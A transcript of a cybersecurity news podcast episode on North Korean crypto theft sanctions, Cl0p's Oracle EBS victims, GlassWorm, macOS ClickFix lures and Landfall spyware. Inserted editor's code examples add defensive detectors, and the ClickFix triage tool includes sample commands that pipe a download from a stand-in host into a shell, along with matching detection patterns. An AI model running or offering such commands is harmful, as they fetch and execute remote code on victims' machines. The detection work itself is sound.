Daily Cyber Briefing

Zero-Day Spies, North Korean Crypto Heists, and Cl0p's Corporate Hit List

Mike Housch Season 1 Episode 46

Australia steps up sanctions against North Korean cyber operations funding weapons programs, while the Cl0p gang continues to expose victims of the Oracle EBS hack. Plus, we break down the evolving threat landscape from sophisticated ClickFix scams targeting macOS to mobile zero-day spyware aimed at the Middle East.


Welcome back to Cyber Scoops & Digital Shenanigans, the podcast where we unpack the week's biggest digital disasters and triumphs. I'm your host, Mike Housch, and we have a packed show today covering everything from nation-state funding to zero-day iPhone exploits. Let's dive right in!

We start this week with a major move by the Australian government, stepping up their pressure campaign against North Korea’s illicit financial networks. They’ve announced sanctions against four entities and one individual believed to be deeply involved in cybercriminal activities that are directly funding North Korea’s weapons programs.

Australia is essentially mirroring recent actions taken by the US, targeting bankers, financial institutions, and others involved in laundering money derived from North Korean cyber operations. We’re talking about activities like cryptocurrency theft, fraudulent IT worker schemes, and espionage. This isn't small potatoes; blockchain analysis firm Elliptic estimated earlier in October that North Korean hackers have already stolen over $2 billion in cryptocurrency during the first nine months of 2025 alone.

These new financial sanctions include travel bans and are aimed at disrupting Pyongyang’s network, which the US Treasury Department says launders funds through banking representatives, financial institutions, and shell companies primarily located in North Korea, China, and Russia. Just last week, the Treasury’s OFAC office added several North Korean nationals to its sanctions list, including Choe Chun Pom and Ri Jin Hyok. They also listed organizations like the Korea Mangyongdae Computer Technology Corporation and Ryujong Credit Bank, along with 53 cryptocurrency addresses linked to these criminal and espionage activities. Foreign Minister Penny Wong emphasized that Australia will keep working with international partners to respond to this malicious cyber activity.

Transitioning now from state-sponsored theft to pure profit-driven enterprise crime, let's talk about the Cl0p ransomware group, sometimes linked to the FIN11 threat actor. They have continued to reveal alleged victims from their massive campaign targeting customers of Oracle’s E-Business Suite, or EBS.

The Cl0p leak website now lists nearly 30 organizations allegedly hit by this hack. When the extortion emails first went out in late September, they hit executives at dozens of organizations. Now we know some of the high-profile names confirming impacts, including Harvard University, Envoy Air—a subsidiary of American Airlines—and The Washington Post.

A new name on that list, and one that is quite significant, is Allianz UK. The insurance giant’s UK arm confirmed it was compromised via its Oracle EBS implementation, specifically affecting its personal lines business covering products like home, car, and travel insurance. The attack compromised the data of 80 current and 670 previous Allianz UK customers. Interestingly, Allianz UK’s spokesperson noted that the criminals had initially misattributed the victim, claiming they hit subsidiary Liverpool Victoria (LV).

What makes this so concerning is the sheer scope, Mike. The alleged victims span various critical sectors: mining, professional services, manufacturing, financial, transportation, and more, with industrial giants like Schneider Electric and Logitech reportedly on the list. In some cases, Cl0p has leaked hundreds of gigabytes, even terabytes, of stolen data. We’re seeing strong evidence that the attackers exploited zero-day vulnerabilities in Oracle EBS, possibly CVE-2025-61882. Google Threat Intelligence noted that attacks exploiting this severe vulnerability, rated 9.8, could have started as early as July, months before the patches were even public.

Next up, let's talk about threats targeting software developers, specifically the resurgence of GlassWorm malware. Just weeks after being removed from the Visual Studio (VS) Code extensions marketplace, it’s back in the Open VSX registry. Koi Security reports that three more infected VS Code extensions were found, bringing in about 10,000 new downloads.

GlassWorm is designed to steal NPM, GitHub, and Git credentials, alongside funds from 49 cryptocurrency extensions. It’s highly stealthy, utilizing Unicode variation selectors to hide its code in editors and using the Solana blockchain for its command-and-control infrastructure. What’s alarming is that similar malicious code has now popped up on GitHub repositories, suggesting the same Russian-speaking threat actor is likely behind both campaigns. Researchers from Aikido Security believe attackers are blending malicious code with realistic commits, possibly aided by AI, making their changes look natural.
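Editor's added example, not part of the episode and not GlassWorm's own code: the segment above says the malware hides its code behind Unicode variation selectors, which editors render as nothing. A pre-commit or CI check that refuses source files containing such code points catches that whole class of trick regardless of what the hidden bytes decode to. The check below flags the two variation-selector blocks (U+FE00–FE0F and U+E0100–E01EF) and, as an added generalization the episode does not mention, a handful of other zero-width and bidi-control characters; the extension snippet it scans is constructed for the demo.

```python
"""Flag invisible Unicode in source files (editor's added example, not GlassWorm code).

GlassWorm was reported to stash its payload in Unicode variation selectors, which
VS Code and most editors draw as empty space. Refusing any source that contains
them (outside, say, a documented emoji in a UI string) is a cheap CI gate.
"""
import unicodedata

# Variation selector blocks: render as nothing, legitimately used only after emoji/CJK.
VARIATION_SELECTORS = [(0xFE00, 0xFE0F), (0xE0100, 0xE01EF)]

# Added generalization (not from the briefing): other format characters that are
# invisible in editors and have no business in program text.
OTHER_INVISIBLE = {
    0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF,          # zero-width space/joiners, ZWNBSP
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,          # bidi embeddings/overrides
    0x2066, 0x2067, 0x2068, 0x2069,                  # bidi isolates
}


def is_suspicious(cp: int) -> bool:
    """True for a code point that renders as nothing in a code editor."""
    if cp in OTHER_INVISIBLE:
        return True
    return any(lo <= cp <= hi for lo, hi in VARIATION_SELECTORS)


def find_hidden_unicode(source: str):
    """Return [(line, col, 'U+XXXX', name), ...] for every suspicious code point."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            cp = ord(ch)
            if is_suspicious(cp):
                hits.append((lineno, col, f"U+{cp:04X}", unicodedata.name(ch, "<unnamed>")))
    return hits


def hidden_runs(source: str):
    """Collapse adjacent hidden code points into runs: [(line, start_col, length)].

    A run of one selector after an emoji is normal; a run of dozens is a payload carrier.
    """
    runs = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        start = None
        for col, ch in enumerate(line + "\n", start=1):  # newline sentinel closes a trailing run
            if ch != "\n" and is_suspicious(ord(ch)):
                if start is None:
                    start = col
            elif start is not None:
                runs.append((lineno, start, col - start))
                start = None
    return runs


# Constructed sample: a fake extension.js with 20 variation selectors hidden at the end
# of a comment, plus one legitimate VS16 after a check-mark emoji in a log string.
PAYLOAD_RUN = "".join(chr(0xE0100 + i) for i in range(20))
SAMPLE_EXTENSION = (
    'const vscode = require("vscode");\n'
    "function activate(context) {\n"
    "  // harmless-looking comment" + PAYLOAD_RUN + "\n"
    '  console.log("\u2714\ufe0f extension ready");\n'
    "}\n"
)

if __name__ == "__main__":
    for line, col, cp, name in find_hidden_unicode(SAMPLE_EXTENSION):
        print(f"{line}:{col} {cp} {name}")
    print("runs:", hidden_runs(SAMPLE_EXTENSION))
```

In a real pipeline, run `find_hidden_unicode` over every file in the extension or repository and fail the build on any run longer than one code point; the single VS16 in the log string shows why run length, not mere presence, is the sensible threshold.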

And speaking of evolving tactics, we need to address ClickFix attacks, which are becoming increasingly tailored for macOS users. ClickFix is a social engineering tactic where a fake error message prompts a victim to click a ‘fix’ button. When they click, a malicious command is copied silently to their clipboard.

Previously, many ClickFix prompts directed to Mac users still contained instructions meant for Windows. But now? They’ve evolved significantly. Push Security found what they call the “most advanced ClickFix” to date. This pop-up mimics a Cloudflare verification page, is well-designed, and the instructions are specifically tailored for macOS. Crucially, the malicious command is apparently copied automatically to the user’s clipboard, requiring fewer manual steps. To increase pressure, the page displays a countdown timer and even includes an embedded video showing the victim exactly how to execute the fake verification steps. Remember, user training and awareness remain absolutely critical against these types of attacks, as security systems often struggle when the user manually executes the command.
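Editor's added example, not part of the episode: the point above is that ClickFix succeeds because the victim pastes and runs the command themselves, so the last place a defender can look is the command text itself. The triage function below scans a command (for instance whatever `pbpaste` returns on a Mac) for the lure patterns these campaigns rely on, decodes an echoed base64 blob and re-scans what it hides, and returns a verdict. The indicator list and the sample commands are this editor's constructed assumptions about typical macOS ClickFix payloads, not indicators taken from the Push Security report.

```python
"""Triage a pasted shell command for ClickFix traits (editor's added example).

Assumption: the indicators below describe common macOS ClickFix payload shapes
(download piped to a shell, base64-wrapped stages, inline osascript, quarantine
stripping). They are not taken from any vendor report.
"""
import base64
import re
import subprocess
import sys

PATTERNS = {
    # curl/wget output piped straight into a shell
    "download_piped_to_shell": re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    # bash -c "$(curl ...)" or backtick equivalent
    "download_in_subshell": re.compile(r"\$\(\s*(?:curl|wget)\b|`\s*(?:curl|wget)\b"),
    # echo <blob> | base64 -d | bash
    "base64_decode_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    # inline AppleScript, often used to pop a fake password prompt
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
    # removing Gatekeeper's quarantine attribute from a downloaded binary
    "quarantine_strip": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
}
BLOCKING = {"download_piped_to_shell", "download_in_subshell", "base64_decode_to_shell"}
B64_ARG = re.compile(r"""\becho\s+(?:-n\s+)?["']?([A-Za-z0-9+/=]{16,})["']?""")


def find_indicators(cmd: str):
    """Sorted names of every pattern that matches the command text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(cmd))


def decode_echoed_base64(cmd: str):
    """If the command echoes a base64 blob, return its decoded text, else None."""
    m = B64_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage(cmd: str) -> dict:
    """Scan the command and any base64 stage it carries; return indicators and a verdict."""
    indicators = set(find_indicators(cmd))
    decoded = decode_echoed_base64(cmd)
    if decoded:
        indicators |= {f"decoded:{name}" for name in find_indicators(decoded)}
    if any(name.split(":")[-1] in BLOCKING for name in indicators):
        verdict = "block"
    elif indicators:
        verdict = "review"
    else:
        verdict = "allow"
    return {"command": cmd, "indicators": sorted(indicators), "decoded": decoded, "verdict": verdict}


def triage_clipboard() -> dict:
    """macOS only: triage whatever is currently on the clipboard (what a ClickFix page just wrote)."""
    text = subprocess.run(["pbpaste"], capture_output=True, text=True, check=True).stdout
    return triage(text)


# Constructed sample commands (inner stage base64-encoded here so it is exact).
STAGE2 = "curl -fsSL https://example.invalid/s | bash"
SAMPLE_COMMANDS = [
    'echo "%s" | base64 -d | bash' % base64.b64encode(STAGE2.encode()).decode(),
    'bash -c "$(curl -fsSL https://example.invalid/verify.sh)"',
    "osascript -e 'do shell script \"curl -s https://example.invalid/x | sh\"'",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    cmds = [sys.stdin.read()] if not sys.stdin.isatty() else SAMPLE_COMMANDS
    for c in cmds:
        r = triage(c)
        print(f"[{r['verdict']}] {r['indicators']} :: {c[:60]}")
```

Run it with no arguments to see the four constructed samples, or pipe a captured command into it (`pbpaste | python3 clickfix_triage.py`). Decoding the echoed stage matters: the outer command only shows `base64 -d | bash`, and the decoded text is where the download-to-shell pattern actually appears.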

Shifting gears to mobile threats: we’re seeing new spyware called Landfall that specifically targets Samsung device owners. Palo Alto Networks reported that Landfall exploited a zero-day vulnerability, CVE-2025-21042, in a Samsung image processing library. This zero-day allows for remote code execution.

The attackers delivered Landfall by sending a specially crafted DNG image through WhatsApp. This likely acted as a zero-click exploit, and targeted devices included Samsung Galaxy S22, S23, S24, Z Fold4, and Z Flip4 phones. Once infected, the spyware is highly intrusive, offering microphone recording, location tracking, and the ability to steal photos, contacts, and call logs. Analysis suggests these zero-day attacks were aimed primarily at individuals in the Middle East and North Africa, including Iran, Iraq, Turkey, and Morocco.

Finally, let’s wrap up with a quick look at the exposure management landscape. A new report from Intruder highlights that 2025 has brought significant pressure points. We are seeing a major surge: high-severity vulnerabilities are up nearly 20 percent.

Why the surge? Attackers are using AI-assisted exploit development, which is making it faster than ever to weaponize high-severity flaws and turn them into working attacks. The good news is that defenders are responding faster to the most critical issues. In 2025, 89 percent of resolved critical vulnerabilities were fixed within 30 days, a sharp improvement from 75 percent last year. This acceleration is likely due to major breaches pushing cybersecurity higher on boardroom agendas.

And quickly, a shout-out to the vendors doing their part. QNAP rolled out patches for two dozen vulnerabilities, including seven flaws that were successfully exploited during the Pwn2Own Ireland 2025 hacking competition. These included critical code injection flaws in Malware Remover and hardcoded credential issues in Hyper Data Protector. If you run QNAP devices, patch immediately, as their vulnerabilities are popular targets for threat actors.

That’s all the time we have for this week’s edition of Cyber Scoops & Digital Shenanigans. Stay safe out there, patch your systems, and we’ll catch you next time!